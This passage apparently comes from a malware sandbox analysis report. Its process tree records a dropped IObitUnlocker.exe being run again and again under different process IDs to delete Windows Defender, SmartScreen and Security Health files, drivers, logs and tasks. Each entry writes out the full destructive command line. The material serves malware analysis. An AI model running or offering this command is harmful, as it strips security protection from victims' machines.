                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:2100
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:2568
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:2056
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:5932
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:5912
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Loads dropped DLL
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:1880
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Loads dropped DLL
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:5236
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Loads dropped DLL
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:5972
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Loads dropped DLL
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:4248
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Loads dropped DLL
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:5172
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 